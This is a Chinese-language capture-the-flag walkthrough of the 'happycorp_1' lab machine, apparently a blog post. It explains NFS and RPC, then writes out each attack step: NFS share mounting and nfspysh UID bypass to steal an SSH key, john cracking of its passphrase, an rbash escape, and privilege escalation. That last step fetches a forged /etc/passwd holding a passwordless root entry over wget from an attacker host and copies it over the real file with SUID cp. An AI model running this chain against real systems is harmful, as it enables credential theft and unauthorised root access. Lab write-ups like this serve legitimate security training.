happycorp_1靶机渗透实战

 

该靶机还是蛮有趣的，属于中等难度，在该次实战中，大家将能接触到NSF入侵以及伪造passwd提权等内容。若有出错的地方，还希望大家指正，后续将为大家带来更精彩的实战。

靶机IP：192.168.8.157

 

nmap全扫

nmap -sS -Pn -A -p- -n 192.168.8.157

出现了几个之前没见过的新的端口服务

2049/tcp  open  nfs_acl
36905/tcp open  nlockmgr

 

web信息收集

http://192.168.8.157/admin.php

http://192.168.8.157/blog.html

web没有什么异常，暂时先放放

 

NFS入侵

NFS介绍

NFS就是Network File System的缩写，它最大的功能就是可以通过网络，让不同的机器、不同的操作系统可以共享彼此的文件。NFS服务器可以让PC将网络中的NFS服务器共享的目录挂载到本地端的文件系统中，而在本地端的系统中来看，那个远程主机的目录就好像是自己的一个磁盘分区一样，在使用上相当便利；

既然NFS是通过网络来进行服务器端和客户端之间的数据传输，那么两者之间要传输数据就要有相对应的网络端口 ；NFS这个服务器的端口开在2049,但由于文件系统非常复杂。因此NFS还有其他的程序去启动额外的端口，这些额外的用来传输数据的端口是随机选择小于1024的端口；既然是随机的，那么客户端又是如何知道NFS服务器端到底使用的是哪个端口呢？这时就需要通过远程过程调用（Remote Procedure Call,RPC）协议来实现了！

RPC与NFS之间的通讯

因为NFS支持的功能相当多，而不同的功能都会使用不同的程序来启动，每启动一个功能就会启用一些端口来传输数据，因此NFS的功能对应的端口并不固定 。而RPC就是用来统一管理NFS端口的服务，并且统一对外的端口是111，RPC会记录NFS端口的信息，如此我们就能够通过RPC实现服务端和客户端沟通端口信息。PRC最主要的功能就是指定每个NFS功能所对应的port number，并且通知客户端，记客户端可以连接到正常端口上去。

NFS和RPC工作流程

1）首先服务器端启动RPC服务，并开启111端口

2）服务器端启动NFS服务，并向RPC注册端口信息

3）客户端启动RPC（portmap服务），向服务端的RPC(portmap)服务请求服务端的NFS端口

4）服务端的RPC(portmap)服务反馈NFS端口信息给客户端。

5）客户端通过获取的NFS端口来建立和服务端的NFS连接并进行数据的传输

这些虽然不用学习太深入，但自己想要多了解的，我之后会自己研究一下该协议的通讯过程，届时欢迎来评论

对上述服务端口协议熟悉了以后，才知道111端口是RPC的portmap服务，配合NFS的2049端口一起使用

NFS挂载

我们现在想挂载到靶机的NSF服务器上看下靶机的共享目录

首先在本机上安装NSF客户端，才能使用NFS相关的命令

sudo apt-get install nfs-kernel-server

扫描一下靶机挂载的共享目录

showmount -e 192.168.8.157

果然发现了靶机上的/home/karl目录是共享出来的

当然我之前做过的笔记中还有使用msf直接扫描挂载目录的方法

use auxiliary/scanner/nfs/nfsmount
set RHOSTS 192.168.8.157

之后，我们可以将靶机的共享目录挂载到本机的目录上，进行访问

在本机的临时文件中新建目录

mkdir /tmp/nsf

挂载到共享目录上：

mount 192.168.8.157:/home/karl /tmp/nsf

进入/tmp/nsf中查看：

还没权限进入.ssh

查阅资料返现在NFSv4以下，存在认证漏洞，允许相同UID的用户直接访问NFS的共享资源。其实kaili中已经安装好了关于该漏洞的探测工具——NFSpy。

该工具使用Python语言编写，包含两个脚本文件nfspy和nfspysh。通过这个工具，用户可以直接访问NFS的共享资源，而不用提供身份信息。同时，该工具还自动隐藏用户，避免被发现。

使用nfspysh访问共享目录：

nfspysh -o server=192.168.8.157:/home/karl

进入.ssh目录，有新发现

全部get下来

拿到了ssh登录的秘钥

flag 1

在user.txt中拿到第一个flag：

flag1{Z29vZGJveQ}

私钥

顺便在公钥中还发下了靶机的用户名

karl@happycorp

很明显，拿私钥去登录，但需要先赋权，别忘了,不然不成功

chmod 600 id_rsa

ssh -i id_rsa karl@192.168.8.157

私钥也加密了，见多了，直接上john解

 

john解私钥

1、先将私钥id_rsa用ssh2john工具生成hash——key

python ~/JRT/run/ssh2john.py id_rsa > key

工具下载地址

链接：https://pan.baidu.com/s/1iTP4L5-GNSBwqK9hDFlVWQ 
提取码：vzqb

2、直接john解，或者跑字典解

john key  
john --wordlist=rockyou.txt key

解出来的密码是 sheep

 

登录提权

ssh -i id_rsa karl@192.168.8.157

登录后发现是rbash的shell

绕过rbash

直接在登录时，-t 生成一个交互式shell进行绕过

ssh -i id_rsa karl@192.168.8.157 -t /bin/sh

进去之后一通乱翻，什么密码，网络都翻遍了，没发现什么

直接查找该靶机可执行的二进制文件：

find / -perm -4000 2> /dev/null

发现了可以使用cp命令

伪造passwd提权

很明显嘛，可以通过复制、覆盖passwd文件进而提权

本地先伪造一个passwd

1、再写入一个具有root权限的空密码的伪用户到passwd中：

echo "hack::0:0:::/bin/bash" >> passwd

2、通过wget将伪造的passwd下载到靶机上，cp命令直接覆盖到/etc/passwd中

wget http://192.168.8.234/passwd
cp passwd /etc/passwd

可以看到覆盖成功

好了，直接 su 提权

su hack

成功拿到第二个flag：

flag2{aGFja2VyZ29k}

 

总结

该靶机还是蛮有意思的
1、通过NFS入侵拿到靶机的登录私钥
2、通过伪造passwd文件覆盖提权

其实在NFS入侵环节中，还可以采用伪造用户的UID进行欺骗登录
有时间我将在后续了解下该协议并总结该服务的相关漏洞

本靶机百度云下载

链接：https://pan.baidu.com/s/1JkO41rRcUS-HV0OeDQdw2A
提取码：oa10